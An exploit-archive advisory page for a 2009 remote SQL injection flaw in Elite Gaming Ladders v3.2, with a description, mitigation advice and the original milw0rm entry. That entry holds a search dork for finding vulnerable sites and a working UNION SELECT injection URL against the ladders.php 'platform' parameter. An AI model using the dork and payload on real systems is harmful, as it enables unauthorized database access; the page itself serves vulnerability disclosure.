Elite Gaming Ladders v3.2 Remote SQL Injection Vulnerability

vendor:

Elite Gaming Ladders v3.2

by:

Snakespc ALGERIAN HaCkEr

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Elite Gaming Ladders v3.2

Affected Version From: 3.2

Affected Version To: 3.2

Patch Exists: NO

Related CWE: N/A

CPE: eliteladders.com

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Elite Gaming Ladders v3.2 Remote SQL Injection Vulnerability

Elite Gaming Ladders v3.2 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The attacker can then execute arbitrary SQL commands on the vulnerable server, allowing them to access sensitive data from the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#--------------------------------------------------------
#Elite Gaming Ladders v3.2 Remote SQL Injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com       
#-------------------------------------------------------
#
#Script:Elite Gaming Ladders v3.2
#
#http://eliteladders.com
#--------------------------------------------------------
#Dork:"Powered by: Elite Gaming Ladders v3.2"
#Exploit:
#--------
#Demo:http://eliteladders.com/demo/ladders.php?platform=-30+UNION%20SELECT%201,2,3,@@version,5,6,7--
----------------------------------------------------------

# milw0rm.com [2009-09-16]